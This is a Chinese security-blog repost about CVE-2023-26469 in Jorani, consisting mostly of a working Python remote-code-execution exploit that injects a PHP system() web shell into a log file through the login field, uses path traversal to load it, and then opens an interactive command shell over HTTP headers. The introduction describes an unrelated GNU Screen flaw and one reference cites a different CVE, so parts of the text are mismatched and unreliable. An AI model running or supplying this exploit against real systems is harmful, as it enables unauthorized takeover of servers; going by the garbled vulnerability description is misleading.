CVE-2023-26469 RCE漏洞(附EXP)

admin 2024年5月19日01:31:13评论187 views字数 3028阅读10分5秒阅读模式
声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了

0x01 前言

GNU Screen 到 4.9.0 中的 socket.c,当安装了 setuid 或 setgid(Arch Linux 和 FreeBSD 等平台上的默认设置)时,允许本地用户向任何 PID 发送特权 SIGHUP 信号,从而导致拒绝服务或中断目标进程

0x02 漏洞影响

    影响版本

Jorani < 1.0.2

0x03 漏洞利用

登录界面

CVE-2023-26469 RCE漏洞(附EXP)

直接利用GitHub大佬的脚本:

https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py

"""vulnerability covered by CVE-2023-26469"""import readlineimport requestsimport datetimeimport sysimport reimport base64import randomimport stringrequests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)msg = lambda x,y="n":print(f'x1b[92m[+]x1b[0m {x}', end=y)err = lambda x,y="n":print(f'x1b[91m[x]x1b[0m {x}', end=y)log = lambda x,y="n":print(f'x1b[93m[?]x1b[0m {x}', end=y)CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"')CMD_PATTERN = re.compile('---------(.*?)---------', re.S)URLS = {  'login' : '/session/login',  'view'  : '/pages/view/',}alphabet = string.ascii_uppercaseHEADER_NAME = ''.join(random.choice(alphabet) for i in range(12))BypassRedirect = {  'X-REQUESTED-WITH'  : 'XMLHttpRequest',  HEADER_NAME    : ""}INPUT = "x1b[92mjrjgjkx1b[0m@x1b[41mjoranix1b[0m(PSEUDO-TERM)n$ " # The input used for the pseudo termu = lambda x,y: x + URLS[y]POISON_PAYLOAD    = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>"PATH_TRAV_PAYLOAD  = "../../application/logs"if __name__ == '__main__':  print("""  /!\ Do not use this if you are not authorized to /!\    """)  log("POC made by @jrjgjk (Guilhem RIOUX)", "nn")  if(len(sys.argv) == 1):    err(f"Usage: {sys.argv[0]} <url>")    exit(0)  log(f"Header used for exploit: {HEADER_NAME}")    t = sys.argv[1]  s = requests.Session()  log("Requesting session cookie")  res = s.get(u(t,"login"), verify = False)  C = s.cookies.get_dict()  Date = datetime.date.today()  log_file_name = f"log-{Date.year}-{str(Date.month).zfill(2)}-{str(Date.day).zfill(2)}"  csrf_token = re.findall(CSRF_PATTERN, res.text)[0]   log(f"Poisonning log file with payload: '{POISON_PAYLOAD}'")  log(f"Set path traversal to '{PATH_TRAV_PAYLOAD}'")  msg(f"Recoveredd CSRF Token: {csrf_token}")  data = {    "csrf_test_jorani"  : csrf_token,    "last_page"      : "session/login",    "language"      : PATH_TRAV_PAYLOAD,    "login"        : POISON_PAYLOAD,    "CipheredValue"    : "DummyPassword"  }  s.post(u(t,"login"), data=data)  log(f"Accessing log file: {log_file_name}")  exp_page = t + URLS['view'] + log_file_name  ### Shell  cmd = ""  while True:    cmd = input(INPUT)    if(cmd in ['x', 'exit', 'quit']):      break    elif(cmd == ""):      continue    else:      BypassRedirect[HEADER_NAME] = base64.b64encode(b"echo ---------;" + cmd.encode() + b" 2>&1;echo ---------;")      res = s.get(exp_page, headers=BypassRedirect)      cmdRes = re.findall(CMD_PATTERN, res.text)      try:        print(cmdRes[0])      except:        print(res.text)        err("Wow, there was a problem, are you sure of the URL ??")        err('exiting..')        exit(0)

success!

CVE-2023-26469 RCE漏洞(附EXP)

0x04 参考来源

https://src.uniontech.com/index.php?c=ti&a=view&advince_id=UTSA-2023-001595https://mp.weixin.qq.com/s/A4YP1wpdRv0QgXT-qHViLwhttps://nvd.nist.gov/vuln/detail/CVE-2023-24626

0x05 修复方案

建议及时更新补丁!

0x06 下载地址

点击下方名片进入公众号

回复关键字【CVE-2023-26469】获取下载链接

原文始发于微信公众号(阿无安全):CVE-2023-26469 RCE漏洞(附EXP)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日01:31:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-26469 RCE漏洞(附EXP)https://cn-sec.com/archives/2036866.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息